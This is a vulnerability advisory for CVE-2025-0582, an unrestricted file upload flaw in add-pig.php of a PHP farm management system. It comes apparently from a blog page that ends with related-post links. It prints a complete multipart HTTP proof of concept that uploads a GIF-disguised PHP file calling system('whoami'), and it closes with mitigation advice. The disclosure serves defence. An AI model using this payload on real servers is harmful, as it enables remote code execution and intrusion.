CVE-2025-0582

Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload

NAME OF AFFECTED PRODUCT(S)

  • Farm Management System In PHP

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • zzz,xiongbaojiang

Vulnerable File

  • add-pig.php

VERSION(S)

  • V1.0

PROBLEM TYPE

Vulnerability Type

  • Unrestricted Upload

Root Cause

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Vulnerability Path

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Key Parameter:

  • Parameter : $res1_name

  • File Name : farm management system/add-pig.php

  • Line Number: 37

    复制代码
    $res1_name = basename($_FILES['pigphoto']['name']);

File Upload:

  • Trigger Path: Arbitrary File Upload/Write

  • File Name : farm management system/add-pig.php

  • Line Number: 45

    move = move_uploaded_file(tmp_name, location.res1_name);

Vulnerability POC

复制代码
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468

-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"

pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"

2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"

male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"

active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"

23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"


-----------------------------85676068117477891701865867569--

Payload:

复制代码
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>

The following are screenshots of some specific information obtained from testing and running with the yakit tool:


复制代码
/uploadfolder/test.php

Recommendations for Vulnerability Mitigation

  1. File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
  2. File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
  3. Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
  4. Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
  5. Input Validation: Rigorously validate all user inputs to ensure security.
相关推荐
神经毒素16 分钟前
WEB安全--RCE--webshell bypass
网络·安全·web安全
ALe要立志成为web糕手3 小时前
第十六周蓝桥杯2025网络安全赛道
安全·web安全·网络安全·蓝桥杯
CHTXRT5 小时前
2025第十六届蓝桥杯大赛(软件赛)网络安全赛 Writeup
c语言·网络·web安全·网络安全·蓝桥杯·wireshark
Synfuture阳途8 小时前
网络准入控制系统:2025年网络安全的坚固防线
网络·安全·web安全
不爱学英文的码字机器16 小时前
零信任架构:重塑网络安全的IT新范式
安全·web安全·架构
星哥说事1 天前
使用开源免费雷池WAF防火墙,接入保护你的网站
web安全·开源
浩浩测试一下1 天前
计算机网络中的DHCP是什么呀? 详情解答
android·网络·计算机网络·安全·web安全·网络安全·安全架构
浩浩测试一下1 天前
SQL注入高级绕过手法汇总 重点
数据库·sql·安全·web安全·网络安全·oracle·安全架构
帅云毅1 天前
Web漏洞--XSS之订单系统和Shell箱子
前端·笔记·web安全·php·xss
迷路的小绅士1 天前
常见网络安全攻击类型深度剖析(三):DDoS攻击——分类、攻击机制及企业级防御策略
网络·web安全·ddos